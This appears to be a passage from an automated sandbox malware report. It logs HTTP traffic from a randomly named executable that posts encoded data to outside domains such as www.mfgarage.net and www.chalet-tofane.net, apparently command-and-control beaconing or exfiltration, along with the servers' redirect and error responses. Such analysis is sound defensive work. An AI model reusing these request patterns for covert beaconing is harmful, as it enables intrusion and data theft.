                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 38 35 4e 31 45 70 31 68 6d 62 62 51 6d 2f 73 2f 68 33 48 52 4b 70 39 38 54 50 68 55 32 78 56 52 69 73 74 49 68 53 6b 34 68 76 72 6e 4e 44 6f 30 55 2b 34 4a 61 6e 68 71 6c 62 4c 6b 63 4d 64 34 64 77 6d 57 2b 54 43 55 70 4a 43 62 6c 54 42 72 34 49 65 5a 5a 6e 34 48 65 70 47 67 63 59 4d 57 74 49 71 73 46 54 61 73 73 57 6a 62 56 45 4b 6e 54 35 6b 43 4b 35 6e 7a 50 69 66 65 42 4a 34 73 35 7a 6d 47 58 51 46 6c 31 71 6d 7a 42 6c 69 43 55 56 55 53 6f 30 41 2f 4b 6b 77 69 2f 75 31 6c 4f 39 4b 33 76 2f 55 4f 37 50 39 4e 73 49 79 49 35 64 56 51 35 78 64 4d 61 75 47 51 64 67 71 75 4b 56 34 61 37 50 42 67 46 63 57 6c 51 78 2b 32 6d 76 47 48 77 6f 65 65 71 54 50 4a 71 53 56 59 79 4e 70 37 38 48 67 33 61 4e 6d 69 61 52 49 51 35 38 48 77 79 44 4d 6a 41 52 61 48 44 54 45 47 71 62 52 6d 2b 33 77 61 74 39 75 78 75 75 33 62 33 32 55 33 73 47 36 6d 77 54 46 5a 54 30 69 72 66 33 33 6e 32 41 64 4b 4c 63 54 4d 31 44 4c 44 2f 39 39 77 73 41 2f 2f 52 6f 53 75 67 72 55 66 30 45 65 78 78 37 74 2b 56 63 65 42 41 65 [TRUNCATED]
                                              Data Ascii: 7LY=85N1Ep1hmbbQm/s/h3HRKp98TPhU2xVRistIhSk4hvrnNDo0U+4JanhqlbLkcMd4dwmW+TCUpJCblTBr4IeZZn4HepGgcYMWtIqsFTassWjbVEKnT5kCK5nzPifeBJ4s5zmGXQFl1qmzBliCUVUSo0A/Kkwi/u1lO9K3v/UO7P9NsIyI5dVQ5xdMauGQdgquKV4a7PBgFcWlQx+2mvGHwoeeqTPJqSVYyNp78Hg3aNmiaRIQ58HwyDMjARaHDTEGqbRm+3wat9uxuu3b32U3sG6mwTFZT0irf33n2AdKLcTM1DLD/99wsA//RoSugrUf0Eexx7t+VceBAet1Z1nQg6zeYS80670e2y/owm7SPWcYq0Lo6TGYtftuLjshihuPBwSLYppLJGdRuZ6xbsbauhP21GFTFriG/wKiSmiJIpDIg8eST05g4BOb+qHY8Kgnccf9D1A4JgXMftbQaemgvFqweo3Ex620ZkKf1PZ3nJZprPJSCwab7iPeFbSDRj7/sQsgqiD86yOPIBF8HotEaU0yb6rXLMUN0CHAYDINFNjjmTwy9jLQjFIGcNaWzFGRynvCmy0iuP4bva9llrZyxYazKOJPTV/4YWoUe+ZapoFzj+USSsJkkTX0eFeqwPXLE+8gqf1nnJs4xs
                                              Sep 24, 2024 11:28:43.631120920 CEST2678OUTData Raw: 39 43 7a 78 4f 2b 64 70 79 67 50 6c 39 4f 6c 37 2b 4a 79 56 59 61 52 36 65 77 42 50 63 6d 46 55 75 50 74 6e 6f 72 67 46 58 47 4d 43 30 43 65 6c 64 48 38 72 33 4b 6f 74 6e 6e 76 7a 75 30 6c 56 4e 48 37 4b 36 37 43 78 50 72 37 72 4c 34 71 63 73 68
                                              Data Ascii: 9CzxO+dpygPl9Ol7+JyVYaR6ewBPcmFUuPtnorgFXGMC0CeldH8r3Kotnnvzu0lVNH7K67CxPr7rL4qcsh2BuBYqrst7r/CJBpQ4H+E43YvIeqifht/GWG46RPha41J76G2uMQNu/keutRzXoSw1Z6mm+eAavsrDjhCADoIf9c8XQtEar6j58Mo/m1UmYflyXouNDYZy4LW232WWdknjFxBfaOuQxf4RiRKb4om6SBDjIiLjGPo
                                              Sep 24, 2024 11:28:43.874447107 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=335; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=cp6gdw1ueIOQU6pq66f2864b; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=2Sosd-SgPhG8_P1ph2FWodPQIavsuAuT2fITEuUSizYoDa05iLf8ZRHosxBtuyJAv2Tsao_zp6HFFOOOmUYbSQ; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=i8h8QgA3QFnjT6rBVvnoop7VyBVVvdSZPpukfOo3Dxk9OPd5ChoBKEqGZ7VXl2piVquOvSTKZZtF9U6YoMIrnw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=GdCrwgFJPF5VQBt9713fwN0U4nIL26pyUqaVRBg3Dp7O0xIki64JIxQETNplfwQCwqZ9FTOG0rQPocLmWySueZ34WhjD9yUkoCtQZrBDgBfB4r5p9pu0LvkTC0aYo_WHxo2t0fM4-ME0qlDFQZdBFSk3YYU5cQ7GturmxMq8hEWGVb_u6L4ii_c9ST9PZo15GVMl4nei8eDWsMB-RUOdyfSPEl4fub1tfz4zvlcA4sSQbCgsBFNARCrGLVAHfQHQvnYvPKy1b-ovIlqZBC_o8OH6zk-yRZ__SwpViBjUn2B93JOpbpiJ7cNskT
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:43.874461889 CEST240INData Raw: 53 77 68 6f 67 66 62 53 55 34 33 63 7a 4c 39 6e 52 51 42 45 35 34 67 2d 61 67 45 6d 34 5f 61 69 7a 56 34 74 6b 76 54 56 4c 65 57 31 30 31 4c 37 38 53 68 5f 6b 68 6e 66 6b 59 36 76 6f 2d 38 6f 53 48 56 48 71 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68
                                              Data Ascii: SwhogfbSU43czL9nRQBE54g-agEm4_aizV4tkvTVLeW101L78Sh_khnfkY6vo-8oSHVHq; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:43 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:43.874473095 CEST183INData Raw: 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6d 66 67 61 72 61 67 65 2e 6e 65 74 25 32 46 78 7a 64 7a 25 32 46 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 54 75 65 2c 20 32 34 20 53 65 70 20 32 30 32 34
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2Fcontent-length: 0date: Tue, 24 Sep 2024 09:28:43 GMTserver: Sahibinden Web ServersX-Proxy: tmll-32 13,20200X-SECURE-OPTION: secure
                                              Sep 24, 2024 11:28:44.078423023 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=335; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=cp6gdw1ueIOQU6pq66f2864b; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=2Sosd-SgPhG8_P1ph2FWodPQIavsuAuT2fITEuUSizYoDa05iLf8ZRHosxBtuyJAv2Tsao_zp6HFFOOOmUYbSQ; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=i8h8QgA3QFnjT6rBVvnoop7VyBVVvdSZPpukfOo3Dxk9OPd5ChoBKEqGZ7VXl2piVquOvSTKZZtF9U6YoMIrnw; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:43 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=GdCrwgFJPF5VQBt9713fwN0U4nIL26pyUqaVRBg3Dp7O0xIki64JIxQETNplfwQCwqZ9FTOG0rQPocLmWySueZ34WhjD9yUkoCtQZrBDgBfB4r5p9pu0LvkTC0aYo_WHxo2t0fM4-ME0qlDFQZdBFSk3YYU5cQ7GturmxMq8hEWGVb_u6L4ii_c9ST9PZo15GVMl4nei8eDWsMB-RUOdyfSPEl4fub1tfz4zvlcA4sSQbCgsBFNARCrGLVAHfQHQvnYvPKy1b-ovIlqZBC_o8OH6zk-yRZ__SwpViBjUn2B93JOpbpiJ7cNskT
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.11.304992985.153.138.113804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:46.398613930 CEST492OUTGET /xzdz/?7LY=x7lVHcpwtLz16okLmHbGfKRnF/5iwEEr5spHmAkItsijFFhieq0XEiVeqKHGapUsexCU+RCpmPC2tDMsopmhIEQEAKOTNNAbk8zRTxmj1zKzDn29d79Ldvk=&Nze=C0klVT HTTP/1.1
                                              Host: www.mfgarage.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:28:46.674077988 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=460; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=I34SzMBJwWsQgGSZ66f2864e; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=jD0VYwRgzCgWyucSMfr2Kns-Z_VYYkWhGF9xaQNo8ZCXhOzbdbT2n8Rmpjr0HXv-BmCsQIxM8_QeBDmBxhav6g; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=8LcScG9cEr_aNPhm1IRB7KxX22MEDbOKModLvhnf-RHnnbTt2gBenGZLFalZO46h41s_XySttqQeLz0EM9msow; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=W-x_7bu5NeR3CmsE-MXyHQwOeYwQmYYemP_HX__6AYguoSWvVGftfI5FgbYvg92mO0ocNIZC27cRq50OQOW7dDS6egXVhrlGReQ0T3SQaoJ-gzaCEuf-EXfot3b_gorx-uzZyg-dOTWeIOW4OOrStRT8QvoKpX5MBLzSX05s_hzUv8l7WOU6kcAOMohIV--nwP06iLDQMUaFnmorp7YrbgvFRCwRPWzleBp4NbcaSQKMZypXG1ELTZMnrUpm7mpuyF-f7JBS6qSe-FTyYH2jjiObV5qIhw0_iXDpy5GsUeKyHXYqU9rS4VYyij
                                              Data Raw:
                                              Data Ascii:
                                              Sep 24, 2024 11:28:46.674089909 CEST240INData Raw: 66 56 37 47 7a 71 4d 76 34 4a 57 54 43 6e 52 61 6c 41 4e 6b 34 6a 76 59 62 39 6d 67 7a 66 67 4a 43 56 4f 50 48 76 36 36 30 6e 56 64 6d 4c 64 67 45 48 75 65 6b 79 6d 30 45 72 78 73 4b 4a 56 66 6b 74 44 53 70 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68
                                              Data Ascii: fV7GzqMv4JWTCnRalANk4jvYb9mgzfgJCVOPHv660nVdmLdgEHuekym0ErxsKJVfktDSp; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:43:46 GMT; Path=/; Secure; SameSite=Nonevary: User-Agentlocation: https://secure.sahibinden.com/login?return_url=
                                              Sep 24, 2024 11:28:46.674101114 CEST333INData Raw: 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6d 66 67 61 72 61 67 65 2e 6e 65 74 25 32 46 78 7a 64 7a 25 32 46 25 33 46 37 4c 59 25 33 44 78 37 6c 56 48 63 70 77 74 4c 7a 31 36 6f 6b 4c 6d 48 62 47 66 4b 52 6e 46 25 32 46 35 69 77 45 45 72
                                              Data Ascii: http%3A%2F%2Fwww.mfgarage.net%2Fxzdz%2F%3F7LY%3Dx7lVHcpwtLz16okLmHbGfKRnF%2F5iwEEr5spHmAkItsijFFhieq0XEiVeqKHGapUsexCU%2BRCpmPC2tDMsopmhIEQEAKOTNNAbk8zRTxmj1zKzDn29d79Ldvk%3D%26Nze%3DC0klVTcontent-length: 0date: Tue, 24 Sep 2024 09:28:45 G
                                              Sep 24, 2024 11:28:46.880871058 CEST1220INHTTP/1.1 302 Found
                                              x-content-type-options: nosniff
                                              x-frame-options: SAMEORIGIN
                                              content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                              pragma: no-cache
                                              expires: 0
                                              cache-control: no-cache, no-store, must-revalidate
                                              set-cookie: vid=460; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: cdid=I34SzMBJwWsQgGSZ66f2864e; Domain=.sahibinden.com; Expires=Fri, 24-Sep-2027 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csss=jD0VYwRgzCgWyucSMfr2Kns-Z_VYYkWhGF9xaQNo8ZCXhOzbdbT2n8Rmpjr0HXv-BmCsQIxM8_QeBDmBxhav6g; Domain=.sahibinden.com; Expires=Tue, 24-Sep-2024 09:58:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csls=8LcScG9cEr_aNPhm1IRB7KxX22MEDbOKModLvhnf-RHnnbTt2gBenGZLFalZO46h41s_XySttqQeLz0EM9msow; Domain=.sahibinden.com; Expires=Wed, 24-Sep-2025 09:28:46 GMT; Path=/; Secure; SameSite=None
                                              set-cookie: csid=W-x_7bu5NeR3CmsE-MXyHQwOeYwQmYYemP_HX__6AYguoSWvVGftfI5FgbYvg92mO0ocNIZC27cRq50OQOW7dDS6egXVhrlGReQ0T3SQaoJ-gzaCEuf-EXfot3b_gorx-uzZyg-dOTWeIOW4OOrStRT8QvoKpX5MBLzSX05s_hzUv8l7WOU6kcAOMohIV--nwP06iLDQMUaFnmorp7YrbgvFRCwRPWzleBp4NbcaSQKMZypXG1ELTZMnrUpm7mpuyF-f7JBS6qSe-FTyYH2jjiObV5qIhw0_iXDpy5GsUeKyHXYqU9rS4VYyij
                                              Data Raw:
                                              Data Ascii:


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.11.304993062.149.128.40804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:52.359749079 CEST776OUTPOST /ytc6/ HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.chalet-tofane.net
                                              Referer: http://www.chalet-tofane.net/ytc6/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 63 61 76 2b 69 30 5a 70 39 77 62 71 47 35 66 79 59 32 35 42 4a 79 41 4d 69 51 73 41 4e 2b 6c 41 54 57 59 42 78 2b 30 57 42 55 4a 49 4d 2f 6f 62 53 79 68 56 30 4f 37 2b 79 30 33 66 38 6f 53 6c 6e 4f 54 4f 47 73 5a 44 5a 46 49 73 57 62 48 39 6d 45 67 62 69 61 36 4e 62 32 4d 2b 63 41 62 67 36 42 4f 47 4d 79 55 6a 4a 35 67 62 48 6e 7a 54 4f 75 32 56 78 4f 36 6b 44 35 55 62 6b 68 31 5a 31 4c 57 64 36 58 6f 78 34 41 4f 37 56 70 56 53 68 77 57 63 4b 30 31 36 42 35 46 76 59 7a 50 76 35 58 6b 2b 74 65 53 4f 5a 37 54 4a 58 6b 71 55 70 43 34 6c 70 55 2b 37 37 41 54 2f 68 52 5a 74 52 41 3d 3d
                                              Data Ascii: 7LY=cav+i0Zp9wbqG5fyY25BJyAMiQsAN+lATWYBx+0WBUJIM/obSyhV0O7+y03f8oSlnOTOGsZDZFIsWbH9mEgbia6Nb2M+cAbg6BOGMyUjJ5gbHnzTOu2VxO6kD5Ubkh1Z1LWd6Xox4AO7VpVShwWcK016B5FvYzPv5Xk+teSOZ7TJXkqUpC4lpU+77AT/hRZtRA==
                                              Sep 24, 2024 11:28:52.563117981 CEST1289INHTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:51 GMT
                                              Connection: close
                                              Content-Length: 4953
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:28:52.563168049 CEST1289INData Raw: 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                              Sep 24, 2024 11:28:52.563249111 CEST1289INData Raw: 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64
                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:28:52.563262939 CEST1289INData Raw: 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:28:52.563272953 CEST16INData Raw: 62 6f 64 79 3e 20 0a 3c 2f 68 74 6d 6c 3e 20 0a
                                              Data Ascii: body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.11.304993162.149.128.40804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:28:55.105057955 CEST796OUTPOST /ytc6/ HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.chalet-tofane.net
                                              Referer: http://www.chalet-tofane.net/ytc6/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 63 61 76 2b 69 30 5a 70 39 77 62 71 47 5a 76 79 4c 46 42 42 5a 69 41 4c 74 77 73 41 45 65 6c 45 54 57 45 42 78 37 56 4c 42 6e 74 49 4e 61 55 62 54 7a 68 56 31 4f 37 2b 71 6b 33 61 7a 49 53 37 6e 4f 66 38 47 74 6c 44 5a 46 63 73 57 62 33 39 6d 58 49 45 69 4b 36 50 52 6d 4d 38 57 67 62 67 36 42 4f 47 4d 79 51 46 4a 39 30 62 47 58 6a 54 63 66 32 57 76 65 36 6c 41 35 55 62 67 68 31 64 31 4c 57 76 36 57 30 62 34 44 36 37 56 6f 6c 53 69 69 2b 64 42 30 31 34 50 5a 45 43 64 32 75 4e 69 6b 38 6f 6b 38 2b 76 54 5a 6a 38 66 54 62 4f 30 42 4d 6e 36 30 43 57 6e 42 2b 58 6a 54 59 32 4d 48 6b 6f 68 63 30 32 37 56 62 4d 37 78 37 62 35 42 51 41 76 79 67 3d
                                              Data Ascii: 7LY=cav+i0Zp9wbqGZvyLFBBZiALtwsAEelETWEBx7VLBntINaUbTzhV1O7+qk3azIS7nOf8GtlDZFcsWb39mXIEiK6PRmM8Wgbg6BOGMyQFJ90bGXjTcf2Wve6lA5Ubgh1d1LWv6W0b4D67VolSii+dB014PZECd2uNik8ok8+vTZj8fTbO0BMn60CWnB+XjTY2MHkohc027VbM7x7b5BQAvyg=
                                              Sep 24, 2024 11:28:55.308546066 CEST1289INHTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:54 GMT
                                              Connection: close
                                              Content-Length: 4953
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:28:55.308566093 CEST1289INData Raw: 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
